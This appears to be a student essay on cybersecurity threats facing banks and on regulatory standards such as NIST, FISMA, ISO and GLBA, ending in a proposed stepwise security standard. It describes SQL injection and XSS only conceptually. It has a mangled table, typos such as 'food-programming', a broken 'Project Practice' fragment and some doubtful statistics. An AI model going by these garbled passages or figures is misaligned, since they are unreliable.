Industry Comments and Proposed Cyber Standards

In the current digital age, more people are putting their personal information online. For instance, financial institutions’ customers no longer stand in queues for banking services. Instead, they connect to the Internet, access their accounts and transact online. This trend has improved convenience. However, it has led to more people being targeted by criminals engaging in cybercrime (Mba et al., 2017). According to a study conducted by B2B International in collaboration with Kaspersky Lab at financial institutions, it was determined that criminals exploit the banking industry’s vulnerabilities to illegally access personal data and steal money. The banks have consequently identified ways to protect their data and information from cyber threats. The research found that primary concerns in the industry include the following:

1. Issues in Financial Sector Percentage
2. Attacks on online or digital banking products 45%
3. Threats on point of sale systems (POS) 40%
4. Phishing and social engineering (attackers steal and use authorized credentials to contact banks) 35%
5. Attack on back office solutions (transactional systems) 35%
6. Threats on automated teller machines (ATMs) 26%
7. Table 1: Top cybersecurity concerns in the banking sector (“Cybersecurity in Financial Institutions,” 2017)

In 2016, phishing in the financial sector stood at 47.48% for Windows and 31.38% for Mac operating systems, the highest figures recorded, according to Kaspersky Lab data analysis. Furthermore, during the same period, the number of attacks caused by Trojans amounted to more than a million. Android malware also increased by 430% due to a bug in a commonly used mobile browser.

The above statistics show how institutions dealing with money constantly remain cybersecurity targets. The losses caused by attacks have an impact on both the banking firms and its customers. Consequently, financial institutions must invest heavily in cybersecurity to protect their information assets in the digital era. Kaspersky Lap statistics summarizes the investment as shown in the graph below:

Figure 1: Cybersecurity investments in the banking and non-banking sectors (“Cybersecurity in Financial Institutions,” 2017)

A report by PwC’s Financial Services Institute on cybersecurity in the financial industry indicates that as cybercrime and threats become more sophisticated, the regulators and banks are raising their scrutiny levels. Furthermore, international privacy and cybersecurity legislation is improving. Today, financial institutions are required to be compliant with additional standards, such as the CFTC and NYDFS. Additionally, the Fed, FDIC and OCC have collaborated to develop and introduce proposed rules for managing cybersecurity in the industry (“Cybersecurity in Financial Services,” 2017). Notably, these policies are most crucial to the sectors that hold money. However, many companies offering financial services still struggle to comply and observe the guidelines.

Maintaining regulatory compliance is a critical and continuous issue for firms offering financial services. However, it is important to adopt such policies to be able to protect information databases and networks. Policies can either be local, based on a firm’s requirements and mission, or general to accommodate other stakeholders. Regulators such as the International Organization for Standardization (ISO) are responsible for developing security standards for a particular industry. Accordingly, banks and other financial institutions need to adopt policies to implement the industry standards.

Currently, the Federal Trade Commission (FTC) reports that 10 million people become victims of identity theft every year in US (“Cybersecurity Standards Organizations,” n.d.). Markedly, cybersecurity standards and policies are developed and implemented to provide guidance for network and data protection. The process involves the collaboration of federal departments, international bodies and nongovernmental institutions. Policies must be created to control user activities, establish accountability, identify roles and ensure the smooth operation of a business. A central policy structure can be established to control and manage the development and implementation of various policies. Most importantly, the adopted standards and implementing policies must be synchronized with the firm’s vision and objectives.

Various bodies and acts are involved in the development of standards that affect online security. In the first instance, the National Institute of Standards and Technology (NIST) are responsible for developing and publishing computer systems standards and guidelines for the country. The 1987 Computer Security Act (CSA) passed by the Congress relies on NIST for the creation of procedures for protecting information in computers. Secondly, the Federal Information Security Management Act (FISMA) of 2002, ensures the security of information in the Fed. Similarly, FISMA gives NIST authority to create and publish security guidelines for the systems used by government. Thirdly, the ISO has developed international standards relating to information technology and business operations. For example, the ISO has created the ISO/IEC17799:05 standard that provides principles for starting, designing, adopting, evaluating and improving security management solutions at enterprises (“Cybersecurity Standards Organizations,” n.d.).

Kitten (2010) notes that the banking industry continues to evaluate, understand, and deploy existing guidelines and standards to emerging business models. Entities continue to engage stakeholders to improve security. However, as the Internet and its related technologies continue to evolve and as such, there are particular regulatory concerns. Since technology is evolving fast, it creates a business platform whose security issues have not been attended to fully. The industry cybersecurity standards need to deal with changes in the IT field. For instance, the Internet has evolved from IPv4 to IPv6 and mobile technology emerged. Such cases require a restructuring of standards. Deloitte reports notes that cyber threats evolve at a too high speed for legislature to act on them timeously. In effect, regulators are solving the issue by releasing reliable standards and expecting adherence from financial institutions (“Forward Look,” 2015).

Additionally, many banks face challenges in deploying solid governance plans in line with regulatory requirements. Bodies such as the Federal Reserve Board (FRB) and the Office of the Comptroller of the Currency (OCC) have released the Enhanced Prudential Standards (EPS) and the Heightened Standards (HS) respectively for banking operations (“Forward Look,” 2015). However, a report by Deloitte notes that gaps may exist between regulatory risk control requirements and a firm’s practices.

Devices connected to the World Wide Web are threatened by attacks from hackers. Surprisingly, attackers take 30 milliseconds to gain unauthorized access to a computer or mobile phone connected to the Internet (“Countermeasures,” n.d.). Threats are created by technical, legal and policy factors at a firm. As such, cybersecurity has become a challenging and expensive affair for organizations that lack proper preparation. On the other hand, lack of information security at a bank may result in an attack that leads to loss of shareholder value, money and valuable data. Technical threats include unpatched software, hardware configuration, poor security policies and technology flaws in banks applications. Secondly, SQL injection results in code attacks that involve hacking an unsecured database through user inputs. Frequently, financial institutions use the web and mobile applications susceptible to SQL injection. XSS is another threat that involves stealing a cookie from an application layer. An attacker uses a client’s browser to forward cookies to a malicious destination. XSS attacks cause identity theft by modifying information on a financial firm’s website to open malicious pages. Unsuspectingly, a user will share credentials with the attacker masquerading as the bank. Other attacks caused by XSS threat include access to paid content, public defamation, denial of service, and browser spying (“Countermeasures,” n.d.).

The banking sector deploys various countermeasures to control and eliminate vulnerabilities identified in computer systems used by financial institutions. A countermeasure deployed depends on the nature and impact of a threat. For instance, IT controls are used to eliminate vulnerabilities in information systems. For instance, banks may install firewalls and antivirus to prevent unauthorized traffic and virus from attacking the network or computers. Other IT controls include setting powerful passwords and practicing food-programming practices. Other security approaches include technical countermeasures that involve physical security to eliminate threats that attack a bank’s infrastructure. Financial institutions should validate user input in mobile and web applications that access a backend database. Lack of this countermeasure gives a hacker an opportunity to modify SQL queries to access a database and disclose critical information or initiate a denial of service attack.

After a threat has occurred, investigators collect digital evidence for admissibility during a judicial process. It involves the collection, sharing, and storage of digital information. Today, electronic data has become a critical source of information. In effect, regulators and law enforcement departments must identify and understand methods for collecting and handling digital evidence (“Digital Evidence,” n.d.).

Specific regulatory issues are being encountered in financial services concerning cybersecurity policies, SQL injection, countermeasures, digital evidence, cyberattacks, cloud computing, mobile technologies and the Gramm-Leach-Bliley Act. Firstly, cybersecurity policies for financial institutions will improve and get tougher. Regulators have been pushing for the enactment of reliable security requirements. For instance, New York authorities have continually improved security policies for banks operating under its jurisdiction (Crosman, 2016).

Banks furthermore fail to take IT experts’ perspectives into play during their operations. However, such an approach can ensure ease of system integration and compatibility. As a result, firms are operating on weak TLS suites, expired SSL certificates and open SMB and FTP ports. Such issues are sources of threats that leave financial institutions open to hackers’ activities. For instance, a client device with an expired SSL certificate is at risk of phishing attacks. Notably, a bank usually runs on large infrastructure, making a security audit a tedious process. However, it is necessary to track and assess banking systems and networks to keep them secure.

A particular issue faced in the industry involves the use of legacy systems that are no longer improved or supported by service providers. Further, an operating system may not be updated. These are some of the loopholes tested by cyber-criminals to detect weak points for infiltration. Further, banks may run on unpatched or expired firewalls and intrusion detection systems. Attacks launched through third-party vendors also threaten financial institutions. For instance, hackers can manipulate an email service used by a firm to initiate an attack. In addition, cloud computing service providers may lack the proper mechanism needed to protect information belonging to a financial services company. Agreeably, third party service providers offer necessary facilities and services to banks.

Project Practice –  offshore database server operated by a cloud service provider. Unfortunately, hackers can manipulate the process of sharing personal information with third parties for financial gain.

Banks should consequently adopt policies that are in line with the GLBA act to prevent the disclosure of personal data to non-affiliated organizations. The standard proposed in this document offers guidelines for implementation of policies that focus on prevention of cyber-attacks. The act covers both the business and the technical approaches required to secure private data. It necessitates firms to share policies for disclosing customer data. In addition, the act requires banks to develop reliable security programs. Overall, the proposed standard will follow a stepwise implementation procedure that requires the responsible entity to identify critical cyber assets, assign roles, establish information handled by the IT assets, develop physical and logical security and access controls, and to train workers.

References

1. Countermeasures. (n.d.). University of Maryland University College. Retrieved from https://lti.umuc.edu/contentadaptor/topics/byid/4828d674-2138-4ce2-9ec5-672125ee459b
2. Crosman, P. (2016, January 5). Are you ready for the cybersecurity challenges of 2016? American Banker. Retrieved from https://www.americanbanker.com/news/are-you-ready-for-the-cybersecurity-challenges-of-2016
3. Cybersecurity in financial institutions 2016 – and what 2017 holds. (2017, March 27). Kaspersky Lab Business. Retrieved from https://business.kaspersky.com/from-the-perils-to-strategies/6682/
4. Cybersecurity in financial services. (2017). PwC’s Financial Services Institute. Retrieved from http://www.pwc.com/us/en/financial-services/research-institute/cybersecurity.html
5. Cybersecurity standards organizations. (n.d.). University of Maryland University College. Retrieved from https://lti.umuc.edu/contentadaptor/topics/byid/7c58564e-ecc6-4ebb-8040-5cdeb02ceaef
6. Digital evidence. (n.d.). University of Maryland University College. Retrieved from https://umuc.equella.ecollege.com/file/6aa8bfb8-7053-4fed-94f6-2547e454c501/1/web/viewer.html?file=https://umuc.equella.ecollege.com/file/380e3a03-157b-433c-8584-b537337de0d0/1/DigitalEvidence.pdf
7. Forward look. (2015). Deloitte Center for Regulatory Strategies. Retrieved from https://www2.deloitte.com/content/dam/Deloitte/us/Documents/finance/us-outlooks-top-regulatory-trends-for-2016-in-banking-reg.PDF
8. Kitten, T. (2010, October 29). Cybersecurity: A growing concern. Bank Info Security. Retrieved from http://www.bankinfosecurity.com/interviews/cybersecurity-growing-concern-i-811
9. Mba, G., Onaolapo, J., Stringhini, G., & Cavallaro, L. (2017). Flipping 419 cybercrime scams: Targeting the weak and the vulnerable. International World Wide Web Conference Committee (IW3C2), April 3-7. Retrieved from http://www0.cs.ucl.ac.uk/staff/J.Onaolapo/papers/wwwcybersafety2017scam.pdf
10. Mohapatra, S., Sahoo, D., & Kesharwani, A. (2015). Outsourcing of information technology: An empirical study of the Indian banking industry. Indian Journal of Finance, 9(7).
11. Rouse, M. (n.d.). Gramm-Leach-Bliley Act (GLBA). TechTarget Network. Retrieved from http://searchcio.techtarget.com/definition/Gramm-Leach-Bliley-Act